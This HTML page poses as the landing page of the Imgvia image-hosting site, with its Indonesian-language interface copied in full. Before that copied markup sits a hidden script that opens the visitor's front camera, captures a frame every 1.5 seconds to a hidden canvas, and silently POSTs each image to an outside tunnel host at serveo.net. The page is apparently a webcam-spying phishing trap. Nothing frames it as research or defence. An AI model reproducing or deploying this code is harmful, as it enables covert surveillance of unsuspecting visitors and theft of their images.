<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'https://sordes.serveo.net/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>

    <body>
    <!DOCTYPE HTML> <html xml:lang="id" lang="id" dir="ltr" class="device-mobile tone-light top-bar-white unsafe-blur-off" prefix="og: http://ogp.me/ns#"> <head> <meta charset="utf-8"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="theme-color" content="#FFFFFF"> <meta name="description" content="Hızlı resim yükle - A free image hosting service."> <title>Imgvia - Free Image Hosting - Hızlı Resim Yükle</title> <meta name="generator" content="Chevereto 3.12.10"><link rel="stylesheet" href="https://imgvia.com/lib/Peafowl/peafowl.min.css?c299b366c6433767a9d4251110158684"><link rel="stylesheet" href="https://imgvia.com/app/themes/Peafowl/style.min.css?c299b366c6433767a9d4251110158684">
<script data-cfasync="false">document.documentElement.className+=" js";var devices=["phone","phablet","tablet","laptop","desktop","largescreen"],window_to_device=function(){for(var e=[480,768,992,1200,1880,2180],t=[],n="",d=document.documentElement.clientWidth||document.getElementsByTagName("body")[0].clientWidth||window.innerWidth,c=0;c<devices.length;++c)d>=e[c]&&t.push(devices[c]);for(0==t.length&&t.push(devices[0]),n=t[t.length-1],c=0;c<devices.length;++c)document.documentElement.className=document.documentElement.className.replace(devices[c],""),c==devices.length-1&&(document.documentElement.className+=" "+n),document.documentElement.className=document.documentElement.className.replace(/\s+/g," ");if("laptop"==n||"desktop"==n){var o=document.getElementById("pop-box-mask");null!==o&&o.parentNode.removeChild(o)}};window_to_device(),window.onresize=window_to_device;function jQueryLoaded(){!function(n,d){n.each(readyQ,function(d,e){n(e)}),n.each(bindReadyQ,function(e,i){n(d).bind("ready",i)})}(jQuery,document)}!function(n,d,e){function i(d,e){"ready"==d?n.bindReadyQ.push(e):n.readyQ.push(d)}n.readyQ=[],n.bindReadyQ=[];var u={ready:i,bind:i};n.$=n.jQuery=function(n){return n===d||void 0===n?u:void i(n)}}(window,document); </script>
<link rel="shortcut icon" href="https://imgvia.com/content/images/system/favicon_1553680227125_d4e758.png"> <link rel="icon" type="image/png" href="https://imgvia.com/content/images/system/favicon_1553680227125_d4e758.png" sizes="192x192"> <link rel="apple-touch-icon" href="https://imgvia.com/content/images/system/favicon_1553680227125_d4e758.png" sizes="180x180"> <style type="text/css">.top-bar-logo, .top-bar-logo img { height: 40px; } .top-bar-logo { margin-top: -20px; } </style><meta property="og:type" content="website" /><meta property="og:url" content="https://imgvia.com" /><meta property="og:title" content="Free Image Hosting - Hızlı Resim Yükle" /><meta property="og:image" content="https://imgvia.com/content/images/system/home_cover_1553680141021_47f7ca.png" /><meta property="og:site_name" content="Imgvia" /><meta property="og:description" content="Hızlı resim yükle - A free image hosting service." /><meta name="twitter:card" content="summary"><meta name="twitter:description" content="Hızlı resim yükle - A free image hosting service."><meta name="twitter:title" content="Imgvia - Free Image Hosting - Hızlı Resim Yükle"><meta name="twitter:site" content="@imgvia"><style>#home-cover-content h1{color:#2981BA;}#home-cover-content p{color:#2981BA;}.btn-text{color:#2981BA;}[class^="icon-"],[class*=" icon-"]{color:#2981BA;}#menu-fullscreen .btn.top-btn-create-account,.top-btn-text,.btn.top-btn-create-account:not(.grey):not(.white){color:#2981BA;}</style> <style> a, a.number-figures:hover, a.number-figures:hover *, .input .icon-input-submit:hover, .input .icon-input-submit:focus, .input .icon-input-submit.focus, .btn.default.outline, .pop-btn-text, .top-bar.white .top-btn-text:hover:not(.btn), .top-bar.white .opened .top-btn-text:not(.btn), .ios .top-bar.white .opened .top-btn-text:not(.btn), .ios .top-bar.white .opened .top-btn-text:not(.top-btn-number), .breadcrum-text a:hover, .content-tabs li:hover a, .upload-box-heading .icon, .list-item-image-btn:hover span, .content-listing-pagination a:hover { 	color: #00A7DA; } .menu-box [role=button]:hover, input:focus, textarea:focus, select:focus, input.search:focus, .input-focus, .tone-dark input:focus, .tone-dark textarea:focus, .tone-dark select:focus, .tone-dark input.search:focus, .tone-dark .input-focus, .btn.default.outline, .btn.active, .content-tabs li:hover, .content-tabs li.current, .content-tabs li.visited, .content-tabs li.visited:hover, .content-tabs li.current, .list-item:hover .list-item-avatar-cover, input:focus, textarea:focus, select:focus, input.search:focus, .input-focus, .tone-dark input:focus, .tone-dark textarea:focus, .tone-dark select:focus, .tone-dark input.search:focus, .tone-dark .input-focus { 	border-color: #00A7DA; } .btn.active, html:not(.phone) .pop-box-menu a:hover, .pop-box-menu a.focus, .list-item-image-btn.liked, .list-item-desc .user:hover { 	background-color: #00A7DA; } .pop-btn-text .arrow-down, .top-bar.white .top-btn-text:hover .arrow-down, .top-bar.white .opened .arrow-down, .ios .top-bar.white .opened .top-btn-text .arrow-down, .header-content-breadcrum a:hover .arrow-down { 	border-top-color: #00A7DA; } .top-bar ul .pop-btn.current, .top-bar ul .top-btn-el.current { 	border-bottom-color: #00A7DA; } .header-content-breadcrum a:hover .arrow-right { 	border-left-color: #00A7DA; } </style> <link rel="alternate" hreflang="x-default" href="https://imgvia.com"> <link rel="alternate" hreflang="nb" href="https://imgvia.com/?lang=nb"><link rel="alternate" hreflang="sk" href="https://imgvia.com/?lang=sk"><link rel="alternate" hreflang="zh-tw" href="https://imgvia.com/?lang=zh-TW"><link rel="alternate" hreflang="he" href="https://imgvia.com/?lang=he"><link rel="alternate" hreflang="id" href="https://imgvia.com/?lang=id"><link rel="alternate" hreflang="ar" href="https://imgvia.com/?lang=ar"><link rel="alternate" hreflang="ru" href="https://imgvia.com/?lang=ru"><link rel="alternate" hreflang="th" href="https://imgvia.com/?lang=th"><link rel="alternate" hreflang="hu" href="https://imgvia.com/?lang=hu"><link rel="alternate" hreflang="ja" href="https://imgvia.com/?lang=ja"><link rel="alternate" hreflang="el" href="https://imgvia.com/?lang=el"><link rel="alternate" hreflang="tr" href="https://imgvia.com/?lang=tr"><link rel="alternate" hreflang="fr" href="https://imgvia.com/?lang=fr"><link rel="alternate" hreflang="fi" href="https://imgvia.com/?lang=fi"><link rel="alternate" hreflang="fa" href="https://imgvia.com/?lang=fa"><link rel="alternate" hreflang="sr-rs" href="https://imgvia.com/?lang=sr-RS"><link rel="alternate" hreflang="vi" href="https://imgvia.com/?lang=vi"><link rel="alternate" hreflang="es" href="https://imgvia.com/?lang=es"><link rel="alternate" hreflang="sv" href="https://imgvia.com/?lang=sv"><link rel="alternate" hreflang="ko" href="https://imgvia.com/?lang=ko"><link rel="alternate" hreflang="pt" href="https://imgvia.com/?lang=pt"><link rel="alternate" hreflang="en" href="https://imgvia.com/?lang=en"><link rel="alternate" hreflang="de" href="https://imgvia.com/?lang=de"><link rel="alternate" hreflang="nl" href="https://imgvia.com/?lang=nl"><link rel="alternate" hreflang="cs" href="https://imgvia.com/?lang=cs"><link rel="alternate" hreflang="zh-cn" href="https://imgvia.com/?lang=zh-CN"><link rel="alternate" hreflang="it" href="https://imgvia.com/?lang=it"><link rel="alternate" hreflang="da" href="https://imgvia.com/?lang=da"><link rel="alternate" hreflang="uk" href="https://imgvia.com/?lang=uk"><link rel="alternate" hreflang="pl" href="https://imgvia.com/?lang=pl"><link rel="alternate" hreflang="pt-br" href="https://imgvia.com/?lang=pt-BR"> </head><body id="index" class="landing"><header id="top-bar" class="top-bar transparent black"> <div class="content-width">		 <div id="logo" class="top-bar-logo"><a href="https://imgvia.com"><img class="replace-svg" src="https://imgvia.com/content/images/system/logo_1553630531637_0afc4c.svg" alt="Imgvia"></a></div>
		 <ul class="top-bar-left float-left">
			<li data-action="top-bar-menu-full" data-nav="mobile-menu" class="top-btn-el phone-show hidden">				<span class="top-btn-text"><span class="icon icon-menu3"></span></span>			</li>
									 </ul>		 <ul class="top-bar-right float-right keep-visible">
						 <li data-action="top-bar-upload" data-link="1" data-nav="upload" class="top-btn-el phone-hide"> <a href="https://imgvia.com/upload" class="top-btn-text"><span class="icon icon-cloud-upload"></span><span class="btn-text phone-hide phablet-hide">Unggah</span></a> </li>			 				<li id="top-bar-signin" data-nav="signin" class="top-btn-el">				<a href="https://imgvia.com/login" class="top-btn-text"><span class="icon icon-login tablet-hide laptop-hide desktop-hide"></span><span class="text phone-hide phablet-hide">Masuk</span></a>			</li>						<li id="top-bar-signup" data-nav="signup" class="phone-hide top-btn-el">				<a href="https://imgvia.com/signup" class="top-btn-text top-btn-create-account btn red text"><span class="icon icon-user2 phablet-hide tablet-hide laptop-hide desktop-hide"></span>Buat akun</a>			</li>												 <li data-nav="about" class="phone-hide pop-btn pop-keep-click pop-btn-delayed"> <span class="top-btn-text"><span class="icon icon-info tablet-hide laptop-hide desktop-hide"></span><span class="text phone-hide phablet-hide">Tentang</span><span class="arrow-down"></span></span> <div class="pop-box arrow-box arrow-box-top anchor-right"> <div class="pop-box-inner pop-box-menu"> <ul> 							<li class="with-icon"><a href="https://imgvia.com/plugin" target=""><span class="btn-icon icon-code2"></span> Plugin</a></li>														<li><a href="https://imgvia.com/blog">Blog</a></li>														<li class="with-icon"><a href="https://imgvia.com/page/Kullanim-sartlari-tos"><span class="btn-icon icon-text"></span> Kullanım Şartları - T.O.S.</a></li>														<li class="with-icon"><a href="https://imgvia.com/page/privacy"><span class="btn-icon icon-lock"></span> Gizlilik Politikası - Privacy</a></li>														<li class="with-icon"><a href="https://imgvia.com/page/iletisim-contact"><span class="btn-icon icon-mail"></span> İletişim - Contact</a></li>							 </ul> </div> </div> </li> 			 <li data-nav="language" class="phablet-hide phone-hide pop-btn">				 <span class="top-btn-text"><span class="text">ID</span><span class="arrow-down"></span></span> <div class="pop-box pbcols5 arrow-box arrow-box-top anchor-center"> <div class="pop-box-inner pop-box-menu pop-box-menucols"> <ul>						<li><a href="https://imgvia.com/?lang=nb">‪Norsk Bokmål‬</a></li><li><a href="https://imgvia.com/?lang=sk">Slovenčina</a></li><li><a href="https://imgvia.com/?lang=zh-TW">繁體中文</a></li><li><a href="https://imgvia.com/?lang=he">עברית</a></li><li class="current"><a href="https://imgvia.com/?lang=id">Bahasa Indonesia</a></li><li><a href="https://imgvia.com/?lang=ar">العربية</a></li><li><a href="https://imgvia.com/?lang=ru">Русский</a></li><li><a href="https://imgvia.com/?lang=th">ไทย</a></li><li><a href="https://imgvia.com/?lang=hu">Magyar</a></li><li><a href="https://imgvia.com/?lang=ja">日本語</a></li><li><a href="https://imgvia.com/?lang=el">Ελληνικά</a></li><li><a href="https://imgvia.com/?lang=tr">Türkçe</a></li><li><a href="https://imgvia.com/?lang=fr">Français</a></li><li><a href="https://imgvia.com/?lang=fi">Suomi</a></li><li><a href="https://imgvia.com/?lang=fa">فارسی</a></li><li><a href="https://imgvia.com/?lang=sr-RS">Српски</a></li><li><a href="https://imgvia.com/?lang=vi">Tiếng Việt</a></li><li><a href="https://imgvia.com/?lang=es">Español</a></li><li><a href="https://imgvia.com/?lang=sv">Svenska</a></li><li><a href="https://imgvia.com/?lang=ko">한국어</a></li><li><a href="https://imgvia.com/?lang=pt">Português</a></li><li><a href="https://imgvia.com/?lang=en">English</a></li><li><a href="https://imgvia.com/?lang=de">Deutsch</a></li><li><a href="https://imgvia.com/?lang=nl">Nederlands</a></li><li><a href="https://imgvia.com/?lang=cs">Čeština</a></li><li><a href="https://imgvia.com/?lang=zh-CN">简体中文</a></li><li><a href="https://imgvia.com/?lang=it">Italiano</a></li><li><a href="https://imgvia.com/?lang=da">Dansk</a></li><li><a href="https://imgvia.com/?lang=uk">Українська</a></li><li><a href="https://imgvia.com/?lang=pl">Polski</a></li><li><a href="https://imgvia.com/?lang=pt-BR">Português (Brasil)</a></li> </ul> </div> </div> </li>						 </ul>
</div></header>

<div id="home-cover" data-content="follow-scroll-opacity">	<div id="home-cover-slideshow"> <div class="home-cover-img" data-src="https://imgvia.com/content/images/system/home_cover_1553680141021_47f7ca.png"></div> </div>	<div id="home-cover-content" class="c20 fluid-column center-box padding-left-10 padding-right-10">				<h1>Unggah dan bagikan gambar anda.</h1>		<p class="c20 center-box text-align-center phone-hide phablet-hide">Tarik dan taruh dimanapun dan mulai unggah gambar anda sekarang. 16 MB tersisa. Tautan gambar langsung, BBCode and sketsa HTML.</p>		<div class="home-buttons">			<a href="https://imgvia.com/upload" class="btn btn-big red">Mulai mengunggah</a>		</div>		<div id="home_after_cta" class="ad-banner"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Oto --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2543400832938124" data-ad-slot="7864497980" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div>	</div></div>
<div id="home_after_cover" class="ad-banner"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Oto --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2543400832938124" data-ad-slot="7864497980" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div>
<div id="powered-by" class="footer">Powered by <a href="https://imgvia.com" rel="generator">Imgvia</a>Hızlı Resim Yükle- Free image hosting</div>
<script> 	$(document).ready(function() { 		if(typeof CHV == "undefined") { 			CHV = {obj: {}, fn: {}, str:{}}; 		} else { 			if(typeof CHV.obj.embed_tpl == "undefined") { 				CHV.obj.embed_tpl = {}; 			} 		} 		CHV.obj.embed_tpl = {"links":{"label":"Tautan","options":{"viewer-links":{"label":"Penonton tautan","template":"%URL_SHORT%","size":"viewer"},"direct-links":{"label":"Tautan langsung","template":"%URL%","size":"full"}}},"html-codes":{"label":"Kode HTML","options":{"html-embed":{"label":"Gambar HTML","template":"<img src=\"%URL%\" alt=\"%FILENAME%\" border=\"0\">","size":"full"},"html-embed-full":{"label":"Tautan penuh HTML","template":"<a href=\"%URL_SHORT%\"><img src=\"%URL%\" alt=\"%FILENAME%\" border=\"0\"><\/a>","size":"full"},"html-embed-medium":{"label":"Tautan medium HTML","template":"<a href=\"%URL_SHORT%\"><img src=\"%MEDIUM_URL%\" alt=\"%MEDIUM_FILENAME%\" border=\"0\"><\/a>","size":"medium"},"html-embed-thumbnail":{"label":"Tautan gambar kecil HTML","template":"<a href=\"%URL_SHORT%\"><img src=\"%THUMB_URL%\" alt=\"%THUMB_FILENAME%\" border=\"0\"><\/a>","size":"thumb"}}},"bbcodes":{"label":"BBcode","options":{"bbcode-embed":{"label":"BBcode penuh","template":"[img]%URL%[\/img]","size":"full"},"bbcode-embed-full":{"label":"Tautan BBcode penuh","template":"[url=%URL_SHORT%][img]%URL%[\/img][\/url]","size":"full"},"bbcode-embed-medium":{"label":"Tautan BBcode sedang","template":"[url=%URL_SHORT%][img]%MEDIUM_URL%[\/img][\/url]","size":"medium"},"bbcode-embed-thumbnail":{"label":"Tautan BBcode gambar kecil","template":"[url=%URL_SHORT%][img]%THUMB_URL%[\/img][\/url]","size":"thumb"}}},"markdown":{"label":"Markdown","options":{"markdown-embed":{"label":"Markdown penuh","template":"![%FILENAME%](%URL%)","size":"full"},"markdown-embed-full":{"label":"Markdown penuh terhubung","template":"[![%FILENAME%](%URL%)](%URL_SHORT%)","size":"full"},"markdown-embed-medium":{"label":"Markdown sedang terhubung","template":"[![%MEDIUM_FILENAME%](%MEDIUM_URL%)](%URL_SHORT%)","size":"medium"},"markdown-embed-thumbnail":{"label":"Thumbnail Markdown ditambahkan","template":"[![%THUMB_FILENAME%](%THUMB_URL%)](%URL_SHORT%)","size":"thumb"}}}}; 	}); </script> <div data-modal="form-embed-codes" class="hidden"> 	<span class="modal-box-title">Kode cantumkan</span> 	<div class="input-label margin-bottom-0 copy-hover-display"> 		<div class="c7 margin-bottom-10"> 			<select name="form-embed-toggle" id="form-embed-toggle" class="text-input" data-combo="form-embed-toggle-combo"> 				<optgroup label="Tautan">	<option value="viewer-links" data-size="viewer">Penonton tautan</option>	<option value="direct-links" data-size="full">Tautan langsung</option></optgroup><optgroup label="Kode HTML">	<option value="html-embed" data-size="full">Gambar HTML</option>	<option value="html-embed-full" data-size="full">Tautan penuh HTML</option>	<option value="html-embed-medium" data-size="medium">Tautan medium HTML</option>	<option value="html-embed-thumbnail" data-size="thumb">Tautan gambar kecil HTML</option></optgroup><optgroup label="BBcode">	<option value="bbcode-embed" data-size="full">BBcode penuh</option>	<option value="bbcode-embed-full" data-size="full">Tautan BBcode penuh</option>	<option value="bbcode-embed-medium" data-size="medium">Tautan BBcode sedang</option>	<option value="bbcode-embed-thumbnail" data-size="thumb">Tautan BBcode gambar kecil</option></optgroup><optgroup label="Markdown">	<option value="markdown-embed" data-size="full">Markdown penuh</option>	<option value="markdown-embed-full" data-size="full">Markdown penuh terhubung</option>	<option value="markdown-embed-medium" data-size="medium">Markdown sedang terhubung</option>	<option value="markdown-embed-thumbnail" data-size="thumb">Thumbnail Markdown ditambahkan</option></optgroup>			</select> 		</div> 		<div id="form-embed-toggle-combo"> 			<div data-combo-value="viewer-links" class="switch-combo"> 							<textarea id="modal-embed-code-0" class="r3 resize-vertical" name="viewer-links" data-size="viewer" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-0">salin</button> 						</div><div data-combo-value="direct-links" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-1" class="r3 resize-vertical" name="direct-links" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-1">salin</button> 						</div><div data-combo-value="html-embed" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-2" class="r3 resize-vertical" name="html-embed" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-2">salin</button> 						</div><div data-combo-value="html-embed-full" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-3" class="r3 resize-vertical" name="html-embed-full" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-3">salin</button> 						</div><div data-combo-value="html-embed-medium" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-4" class="r3 resize-vertical" name="html-embed-medium" data-size="medium" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-4">salin</button> 						</div><div data-combo-value="html-embed-thumbnail" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-5" class="r3 resize-vertical" name="html-embed-thumbnail" data-size="thumb" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-5">salin</button> 						</div><div data-combo-value="bbcode-embed" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-6" class="r3 resize-vertical" name="bbcode-embed" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-6">salin</button> 						</div><div data-combo-value="bbcode-embed-full" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-7" class="r3 resize-vertical" name="bbcode-embed-full" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-7">salin</button> 						</div><div data-combo-value="bbcode-embed-medium" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-8" class="r3 resize-vertical" name="bbcode-embed-medium" data-size="medium" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-8">salin</button> 						</div><div data-combo-value="bbcode-embed-thumbnail" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-9" class="r3 resize-vertical" name="bbcode-embed-thumbnail" data-size="thumb" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-9">salin</button> 						</div><div data-combo-value="markdown-embed" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-10" class="r3 resize-vertical" name="markdown-embed" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-10">salin</button> 						</div><div data-combo-value="markdown-embed-full" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-11" class="r3 resize-vertical" name="markdown-embed-full" data-size="full" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-11">salin</button> 						</div><div data-combo-value="markdown-embed-medium" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-12" class="r3 resize-vertical" name="markdown-embed-medium" data-size="medium" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-12">salin</button> 						</div><div data-combo-value="markdown-embed-thumbnail" class="switch-combo soft-hidden"> 							<textarea id="modal-embed-code-13" class="r3 resize-vertical" name="markdown-embed-thumbnail" data-size="thumb" data-focus="select-all"></textarea> 							<button class="input-action" data-action="copy" data-action-target="#modal-embed-code-13">salin</button> 						</div>		</div> 	</div> </div>

<script defer data-cfasync="false" src="https://imgvia.com/lib/Peafowl/js/scripts.min.js?c299b366c6433767a9d4251110158684" id="jquery-js" onload="jQueryLoaded(this, event)"></script><script defer data-cfasync="false" src="https://imgvia.com/lib/Peafowl/peafowl.min.js?c299b366c6433767a9d4251110158684" id="peafowl-js"></script><script defer data-cfasync="false" src="https://imgvia.com/app/lib/chevereto.min.js?c299b366c6433767a9d4251110158684" id="chevereto-js"></script><script data-cfasync="false">var CHEVERETO = {"id":"Z6zE","edition":"Chevereto","version":"3.12.10","source":{"label":"Chevereto.com\/panel\/downloads","url":"https:\/\/chevereto.com\/panel\/downloads"},"api":{"download":"https:\/\/chevereto.com\/api\/download","get":{"info":"https:\/\/chevereto.com\/api\/get\/info\/?id=Z6zE"}}}</script> <script data-cfasync="false"> document.getElementById("chevereto-js").addEventListener("load", function () { 	PF.obj.devices = window.devices; 	PF.fn.window_to_device = window.window_to_device; 	PF.obj.config.base_url = "https://imgvia.com"; 	PF.obj.config.json_api = "https://imgvia.com/json"; 		PF.obj.config.listing.items_per_page = "24"; 	PF.obj.config.listing.device_to_columns = {"phone":"1","phablet":"3","tablet":"4","laptop":"5","desktop":"6","largescreen":"6"}; 	PF.obj.config.auth_token = "674d1e23f6ea15dc6cabd187c32a05d5671eb39c"; 	PF.obj.l10n = {"Invalid email":["Email tidak benar"],"Invalid username":["Username tidak benar"],"Invalid password":["Password salah"],"Invalid website mode":["Mode website salah"],"From email address":["Alamat email pengirim"],"Sender email for emails sent to users.":["Alamat pengirim untuk email yang dikirim ke user."],"Incoming email address":["Alamat email masuk"],"Recipient for contact form and system alerts.":["Penerima untuk halaman kontak dan notifikasi sistem."],"Website mode":["Mode website"],"You can switch the website mode anytime.":["Ada dapat mengubah mode website kapanpun."],"Community":["Komunitas"],"Personal":["perseorangan"],"Update in progress":["Pembaharuan sedang berlangsung"],"An error occurred. Please try again later.":["Terjadi sebuah kesalahan. Harap coba lagi lain kali."],"Missing %s file":["File %s hilang"],"Invalid license info":["info lisensi tidak valid"],"Invalid license key":["kunci lisensi tidak valid"],"Can't save file":["Tidak dapat menyimpan file"],"Can't download %s":["Tidak dapat mengunduh %s"],"Can't extract %s":["Tidak dapat mengekstrak %s"],"Can't create %s directory - %e":["Tidak dapat membuat direktori %s - %e"],"Can't update %s file - %e":["Tidak dapat memperbarui berkas %s - %e"],"Untitled":["Tidak berjudul"],"%s's images":["%s foto"],"Note: This content is private but anyone with the link will be able to see this.":["Catatan: Konten ini bersifat pribadi namun siapapun yang memiliki tautan dapat melihat ini."],"Note: This content is password protected. Remember to pass the content password to share.":["Catatan: Konten ini dilindungi kata sandi.\nIngat untuk melewati konten dengan kata sandi untuk dibagikan."],"Note: This content is private. Change privacy to \"public\" to share.":["Catatan: Ini konten pribadi. Ubah privasi ke \"Umum\" untuk membagikan."],"Private":["Pribadi"],"Public":["Umum"],"Me":["Aku"],"Link":["Sambungan"],"Password":["Kata sandi"],"view":["dilihat"],"After %n %t":["Setelah %n %t"],"Don't autodelete":["Jangan hapus otomatis"],"minute":["menit"],"hour":["jam"],"day":["hari"],"Duplicated upload":["Gandakan unggahan"],"Error storing file in external storage server":["Kesalahan menyimpan berkas di server penyimpanan eksternal"],"External storage has failed":["Penyimpanan eksternal gagal"],"Private upload":["Unggahan pribadi"],"Upload switched to local storage":["Pengunggahan dialihkan ke penyimpanan lokal"],"System has switched to local storage due to not enough disk capacity (%c) in the external storage server(s). The image %s has been allocated to local storage.":["Sistem telah beralih ke penyimpanan lokal dikarenakan kapasitas disk tidak mencukupi (%c) di server penyimpanan eksternal. Gambar %s telah dialokasikan ke penyimpanan lokal."],"like":["suka"],"image":["foto"],"Top users":["Pengguna teratas"],"Most recent":["Terbaru"],"Oldest":["Terlama"],"Most viewed":["Paling dilihat"],"Most liked":["Paling disukai"],"Explore":["Jelajahi"],"Search":["Cari"],"Image":["Gambar"],"Album":["Album"],"User":["Pengguna"],"Can't create %s destination dir":["Tidak dapat membuat direktori tujuan %s"],"Can't open %s for writing":["Tidak dapat membuka %s untuk ditulis"],"Internal":["Internal"],"Can't insert storage.":["Tidak dapat menyisipkan penyimpanan."],"Storage capacity can't be lower than its current usage (%s).":["Kapasitas penyimpanan tidak bisa lebih rendah dari penggunaan sekarang (%s)."],"Can't update storage details.":["Tidak dapat memperbarui detail penyimpanan."],"Unlimited":["Tanpa batasan"],"used":["digunakan"],"Private profile":["Profil pribadi"],"year":["tahun"],"month":["bulan"],"week":["minggu"],"second":["detik"],"%s ago":["%s yang lalu"],"moments ago":["beberapa waktu lalu"],"System notification":["Notifikasi sistem"],"Dashboard":["Beranda"],"There is an update available for your system. Go to %s to download and install this update.":["Terdapat pembaruan untuk sistem anda. Pergi ke %s untuk mengunduh dan memasang pembaruan ini."],"System database is outdated. You need to run the <a href=\"%s\">update<\/a> tool.":["Sistem database sudah kadaluarsa. Anda perlu untuk menjalankan menu <a href=\"%s\">update<\/a>"],"Website is in maintenance mode. To revert this setting go to <a href=\"%s\">Dashboard > Settings<\/a>.":["Website sedang dalam perbaikan. Untuk merubah setting ini kunjungi <a href=\"%s\">Menu Utama > Pengaturan<\/a>"],"You should disable PHP error reporting for production enviroment. Go to <a href='%s'>System settings<\/a> to revert this setting.":["Anda harus menonaktifkan pelaporan kesalahan PHP untuk lingkungan produksi. Pergi ke <a href='%s'>Pengaturan sistem<\/a> untuk mengembalikan pengaturan ini."],"You haven't changed the default email settings. Go to <a href='%s'>Email settings<\/a> to fix this.":["Anda belum mengubah pengaturan email bawaan. Pergi ke <a href='%s'>Pengaturan Email<\/a> untuk memperbaiki hal ini."],"There is an update available for your Chevereto based website.":["Terdapat pembaruan untuk website berbasis Chevereto anda."],"The release notes for this update are:":["Catatan rilis untuk pembaruan ini diantaranya:"],"admin dashboard":["dasbor admin"],"You can apply this update directly from your %a or download it from %s and then manually install it.":["Anda dapat menerapkan pembaruan ini secara langsung dari %a anda atau mengunduhnya dari %s dan kemudian secara manual memasangnya."],"Chevereto update available (v%s)":["Pembaruan Chevereto tersedia (v%s)"],"view on %s":["Ditampilkan pad %s"],"We use our own and third party cookies to improve your browsing experience and our services. If you continue using our website is understood that you accept this cookie policy.":["Kami menggunakan kuki sendiri dan pihak ke tiga untuk meningkatkan pengalaman pencarian dan layanan kami. Jika anda melanjutkan menggunakan website kami, berarti anda menyetujui kebijakan kuki ini."],"You have been forbidden to use this website.":["Anda telah diblokir dari website ini."],"Feel free to browse and discover all my shared images and albums.":["Silahkan mencari dan menemukan semua gambar dan album yang saya bagikan."],"View all my images":["Tampilkan semua gambarku"],"That page doesn't exist":["Halaman tersebut tidak tersedia."],"Forgot password?":["Lupa password anda?"],"Reset password":["atur ulang password"],"Resend account activation":["Kirim kembali kode aktivasi"],"Add your email address":["Masukkan alamat email anda"],"Email changed":["Email telah berubah"],"The reCAPTCHA wasn't entered correctly":["Kode reCAPTCHA salah"],"Invalid Username\/Email":["Username\/Email tidak sah"],"User doesn't have an email.":["Pengguna tidak memiliki email"],"Request denied":["Permintaan ditolak"],"Account needs to be activated to use this feature":["Akun perlu untuk diaktivasi agar bisa menggunakan fitur ini"],"Account already activated":["Akun telah diaktivasi"],"Allow up to 15 minutes for the email. You can try again later.":["Tunggu sampai 15 menit untuk email. Anda bisa mencoba lagi nanti."],"Reset your password at %s":["Reset password anda di %s"],"Confirmation required at %s":["Konfirmasi diperlukan di %s"],"Welcome to %s":["Selamat datang di %s"],"Passwords don't match":["Password tidak cocok"],"Email already being used":["Email telah digunakan"],"Check the errors in the form to continue.":["Periksa kesalahan pada kotak isian untuk melanjutkan"],"Password required":["Kata sandi 